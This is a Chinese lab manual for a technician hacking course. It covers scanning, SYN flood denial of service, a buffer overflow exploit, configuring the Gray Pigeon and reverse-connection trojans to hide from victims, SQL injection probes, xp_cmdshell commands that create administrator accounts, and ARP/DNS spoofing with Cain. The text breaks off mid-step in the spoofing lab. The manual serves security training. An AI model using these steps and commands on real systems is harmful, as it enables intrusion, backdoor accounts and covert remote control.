技术人员培训实验手册黑客攻击课程

1、 技术人员培训实验手册 -黑客攻击课程实验目 录实验预备工具31 VMWare使用32 EtherPeek NX的使用3黑客攻防实验51 X-Scan扫描工具应用实验52 Synflood拒绝服务实验63 缓冲区溢出实验74 灰鸽子木马实验95 反向连接木马实验136 蠕虫扫描实验147 SQL 注入攻击158 欺骗攻击实验17实验预备工具1 VMWare使用（1）选择关闭虚拟机电源，选择 将虚拟机挂起，选择启动虚拟机。（2）点击，虚拟机进入全屏状态，按住Ctrl+Alt退出全屏。2 EtherPeek NX的使用（1）按new capture，新建一个捕包任务。 （2）配置任务的属性。选择的

2、网卡为欲捕获数据包的网口。（3）点击 Start Capture，开始捕获数据包。（4）通过选择不同的选项卡，从不同角度查看捕获的数据包。黑客攻防实验1 X-Scan扫描工具应用实验 ² 实验环境：操作系统：windows 2000/xp；实验工具：X-Scan v3.3实验环境示意图： ² 实验步骤：(1) 在windows系统上运行X-Scan。(2) 设定扫描参数(3) 运行扫描 点击开始运行扫描² 实验结果：扫描结束后，得出扫描报告。可查看被扫描主机存在的漏洞信息。2 Synflood拒绝服务实验² 实验环境：操作系统：windows 2000

3、server虚拟机，windows 2000/xp实验工具：synflood实验环境示意图： ² 实验步骤：（1） 在windows 2000 server虚拟机系统上运行Synflood。（synflood不可运行在windows XP系统）运行cmd，定位synflood路径，本例中synflood存放在C盘根目录下，因此格式为：C:> c:synflood.exe <攻击目的IP>（2）在被攻击主机上运行EtherPeek，抓包的表现如下：² 运行结果：虚拟多个IP主机攻击目标主机，致使目标主机资源耗尽。3 缓冲区溢出实验² 实验环境：操作

4、系统：windows 2000 server虚拟机（被攻击方主机），windows 2000（攻击方主机）实验工具：X-Scan，pnpscan，pnp_exp，远程桌面工具实验环境示意图： ² 实验步骤：（1）确定攻击目标。在攻击方主机上运行X-Scan扫描目标主机上是否开放445，139，3389端口。（2）利用pnpscan扫描目标主机的445或139端口是否存在漏洞。（3）用pnp_exp进行缓冲区溢出攻击，注意要在绑定IP中输入攻击主机的IP，绑定端口可输入一些常规端口，例如：80，8080，21等来迷惑目标主机的用户。（4）溢出完毕后，在攻击主机上可以看到已进入目标系统。

5、（5）在命令行提示符下添加管理员账号，命令如下：net user admin 123 /add (加用户) (添加的用户名是admin 密码是123)net localgroup administrators admin /add (加组)（6）启动远程桌面工具，利用添加的用户，进入目标主机² 攻击结果：获得目标主机超级管理员的权限。4 灰鸽子木马实验² 实验工具：操作系统：windows 2000 server 虚拟机（被攻击方），windows xp/2000（攻击方）实验工具：灰鸽子实验环境示意图： ² 实验步骤：（1）配置服务器端 在攻击方打开灰鸽子客户端

6、。 打开配置程序配置服务器端 安装路径和安装名称可以修改，以达到迷惑被攻击主机用户的目的。 选择运行后删除安装文件达到隐藏自身的目的。 设置开机自动加载方式和关联文件 设定捆绑文件，即在被攻击主机上运行服务器端，用户看到的是绑定的文件内容。 选中待配置的服务器文件为灰鸽子自带的Kernel32。服务器端程序配置成功。（2）木马植入 将生成的服务器端程序Kernel32.exe植入被攻击系统。 在目标机上运行Kernel32，打开资源管理器可以看到Kernel32的进程。² 实验结果 ：客户端连接服务器端，连接成功后，就可以控制被攻击主机。665 反向连接木马实验² 实验环境

7、：操作系统：windows 2000 server 虚拟机（被攻击方），windows xp/2000（攻击方）实验工具：tequila bandita(tb)实验环境示意图： ² 实验步骤：(1) 打开tequila bandita（tb）木马客户端，选择菜单选项-生成服务器端。注意IP地址栏填写攻击方的IP。端口可以填入一些常规端口，如80，8080，21等迷惑被攻击方用户。(2) 连接服务器端成功后，在客户端如下显示：² 实验结果：控制目标主机。6 蠕虫扫描实验² 实验环境：操作系统：windows 2000 server实验工具：nmap实验环境示意图：

8、² 实验步骤：(1) 用nmap模拟蠕虫的扫描过程，本例中以扫描445端口为例。命令如下：nmap路径 sP (注：使用"-sP"命令，进行ping扫描，"PT"选项可以对网络上指定端口进行扫描)出现Host * （IP地址）appears to be up.代表 *主机此端口打开。² 实验结果：捕包结果如下：7 SQL 注入攻击² 实验环境：操作系统：windows 2000 server虚拟机（被攻击方），windows xp/2000(攻击方)实验工具：无实验环境示意图： ² 实验步骤：（1）准备条件把IE菜

9、单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。 （2）判断能否可以进行SQL注入可利用以下测试方法测试： http:/showdetail.asp?id=49 http:/showdetail.asp?id=49 and 1=1 http:/showdetail.asp?id=49 and 1=2这就是经典的1=1、1=2测试法了，可以注入的表现： 正常显示 正常显示，内容基本与相同 提示BOF或EOF（程序没做任何判断时）、或提示找

10、不到记录（判断了rs.eof时）、或显示内容为空（程序加了on error resume next）（3）判断数据库类型及注入方法分别在地址栏中输入以下网址探测：http:/showdetail.asp?id=49 and (select count(*) from sysobjects)>0 http:/showdetail.asp?id=49 and (select count(*) from msysobjects)>0如果数据库是SQLServer，第一个网址的页面与原页面http:/showdetail.asp?id=49 大致相同；而第二个网址会提示出错，就算程序有容错

11、处理，页面也与原页面完全不同。   如果数据库用的是Access，第一个网址的页面与原页面完全不同；第二个网址与原网址也是完全不同。大多数情况下，用第一个网址就可以得知系统所用的数据库类型，第二个网址只作为开启IIS错误提示时的验证。(4) 利用系统表注入SQLServer数据库 用net命令新建了用户名为name、密码为password的windows的帐号http:/Site/url.asp?id=1;exec master.xp_cmdshell “net user name password /add”- 将新建的帐号name加入管理员组http:/Sit

12、e/url.asp?id=1;exec master.xp_cmdshell “net localgroup name administrators /add”-这种方法只适用于用sa连接数据库的情况，否则，是没有权限调用xp_cmdshell的。² 实验结果：获得被攻击系统超级权限。8 欺骗攻击实验² 实验环境操作系统：Windows 2000虚拟机（攻击方主机），windows xp/2000（被攻击方主机）实验工具：EtherPeek NX (抓包工具)，Cain&Abel (黑客工具)实验环境示意图： ² 实验步骤（1）打开EtherPeek NX

13、选择New Capture，选择capture->capture options, 设置filter的条件。（2）双击DNS编辑过滤条件，即协议类型是DNS，地址是10。（3）在被攻击主机上测试ping ，抓包表现如下：双击一条记录，可以看到目的DNS服务器的MAC地址。本例中显示的是被攻击主机的DNS服务器的MAC地址为 00 0E 0C 69 F5 79 。（4）打开虚拟机，启动Cain，选中sniffer，点击运行sniffer，扫描本网段内的主机。（5）选择Sniffer选项，ARP>DNS（6）选择Add to list, DNS Name Requested填入, IP address to rewrite in response packets填入